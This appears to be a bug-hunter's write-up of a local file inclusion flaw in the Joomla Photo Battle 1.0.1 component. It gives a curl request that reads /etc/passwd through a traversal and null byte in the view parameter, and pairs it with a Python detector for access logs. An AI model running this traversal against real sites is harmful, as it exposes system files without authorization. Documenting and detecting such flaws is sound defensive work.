Bug Name:  Joomla! Component Photo Battle 1.0.1 - Local File Inclusion

Severity:  medium

Priority:  P3

Risk Level:  MEDIUM - 6/10

CVSS Score:  5

Description:

A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.

Exploit Commands

Bash

  curl -i -s -k -X 'GET' \
  'https://example.com/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00'

⚠️ Warning: These commands are for authorized security testing only. Unauthorized access is illegal.

Expected Matchers

  • root:.:0:0:

Status codes to expect: 200
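
Detection

On the defensive side, the request shown above leaves a recognisable trace in web server access logs. The following is an added example, not part of the original write-up: it flags com_photobattle requests whose view parameter decodes to a traversal sequence, an absolute path or a NUL byte. The function names, log format (combined) and sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request target inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_photobattle_traversal(log_line):
    """True for a com_photobattle request whose view parameter carries a
    traversal sequence, an absolute path or a NUL byte."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return False
    params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if "com_photobattle" not in params.get("option", []):
        return False
    for raw_view in params.get("view", []):
        view = decode_fully(raw_view).replace("\\", "/")
        if "../" in view or view.startswith("/") or "\x00" in view:
            return True
    return False

# Constructed sample lines (documentation IP ranges; "battle" is a made-up view name).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_photobattle&view=../../../../etc/passwd%00 HTTP/1.1" 200 1532',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?option=com_photobattle&view=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 88',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?option=com_photobattle&view=battle HTTP/1.1" 200 9120',
    '198.51.100.4 - - [01/Jan/2024:10:01:05 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 7011',
]

def flagged(lines):
    """Return the log lines that match the traversal pattern."""
    return [line for line in lines if is_photobattle_traversal(line)]

if __name__ == "__main__":
    for line in flagged(SAMPLE_LOG):
        print("ALERT", line)
```

The trailing %00 in the request is a null-byte truncation; PHP has rejected NUL bytes in file paths since 5.3.4, so a flagged request against a newer runtime may indicate scanning rather than a successful read.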

Thanks for reading! If you found this useful, feel free to share it with your fellow hunters. Happy hacking!